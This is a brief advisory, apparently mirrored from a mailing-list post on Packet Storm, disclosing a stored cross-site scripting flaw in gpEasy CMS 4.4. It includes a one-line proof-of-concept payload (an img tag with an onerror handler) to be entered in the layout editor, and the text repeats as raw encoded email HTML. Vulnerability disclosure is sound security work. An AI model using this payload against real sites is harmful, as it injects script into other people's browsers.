gpEasy CMS version 4.4 suffers from a persistent cross site scripting vulnerability.
8f52cba5c22c60add1d64b7fc341bfb581007b33aaf8e37c00b2e1950dbf2196# Affected software: gpeasy cms
# Type of vulnerability:stored xss
# URL:gpeasy.com
# Discovered by: provensec
# Website: provensec.com
#version: gpEasy 4.4
# Proof of concept
goto
edit layout and fill filed with xss payload "><img src=d
onerror=confirm(1);> and save it javascript will execute
--20cf303f64d02dcd89051578f782
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
<div dir=3D"ltr"><div class=3D"gmail_default" style><span style=3D"font-fam=
ily:'comic sans ms',sans-serif"></span><font face=3D"comic sans ms,=
sans-serif"># Affected software:=A0gpeasy cms</font></div><div class=3D"gm=
ail_default" style><font face=3D"comic sans ms, sans-serif"># Type of vulne=
rability:stored xss</font></div><div class=3D"gmail_default" style><font fa=
ce=3D"comic sans ms, sans-serif"># URL:<a href=3D"http://gpeasy.com">gpeasy=
.com</a></font></div><div class=3D"gmail_default" style><font face=3D"comic=
sans ms, sans-serif"># Discovered by: provensec</font></div><div class=3D"=
gmail_default" style><font face=3D"comic sans ms, sans-serif"># Website: <a=
href=3D"http://provensec.com">provensec.com</a></font></div><div class=3D"=
gmail_default" style><font face=3D"comic sans ms, sans-serif"><br></font></=
div><div class=3D"gmail_default" style><font face=3D"comic sans ms, sans-se=
rif">#version:=A0</font><span style=3D"color:rgb(136,136,136);font-family:s=
ans-serif;font-size:11px;line-height:18px;background-color:rgb(34,34,34)">g=
pEasy 4.4</span></div><div class=3D"gmail_default" style><font face=3D"comi=
c sans ms, sans-serif"># Proof of concept</font><span style=3D"font-family:=
'comic sans ms',sans-serif"></span></div><div class=3D"gmail_defaul=
t" style><span style=3D"font-family:'comic sans ms',sans-serif"><br=
></span></div><div class=3D"gmail_default" style><font face=3D"comic sans m=
s, sans-serif">goto=A0</font></div><div class=3D"gmail_default" style><font=
face=3D"comic sans ms, sans-serif"><br></font></div><div class=3D"gmail_de=
fault" style><font face=3D"comic sans ms, sans-serif">edit layout and fill =
filed with xss payload=A0"><img src=3Dd onerror=3Dconfirm(1);>=
; and save it javascript will execute=A0</font><br></div><div class=3D"gmai=
l_default" style><font face=3D"comic sans ms, sans-serif"><br></font></div>=
<div class=3D"gmail_default" style><font face=3D"comic sans ms, sans-serif"=
><br></font></div></div>
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed